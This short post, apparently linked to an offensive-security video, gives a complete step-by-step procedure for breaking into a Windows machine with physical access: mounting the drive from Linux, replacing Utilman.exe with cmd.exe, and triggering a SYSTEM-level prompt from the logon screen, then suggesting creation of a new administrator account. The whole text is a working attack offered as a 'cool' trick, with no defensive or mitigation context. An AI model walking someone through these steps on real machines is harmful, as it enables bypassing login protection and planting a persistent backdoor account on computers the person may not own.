Check out the cool video on how quick and easy the task of breaking into a Windows system wherever physical access to the machine is present.
Offensive security link
- Load up any linix OS
- Mount the windows drive in a rw state: "mount -t ntfs-3g /dev/sda1 /mnt/sda1"
- Navigate to the Windows/System32 folder: "cd /mnt/sda1/Windows/System32"
- Rename Utilman.exe : "mv Utilman.exe Utilman.bak"
- Copy cmd.exe to a the name of Utilman.exe: "cp cmd.exe Utilman.exe"
- Reboot Comp: "reboot"
- When on the logon screen hold down the 'windows key' and 'U' and you should be presented with a command prompt with system priviledges. From here on you might wanna create a new user and add him to the administrators group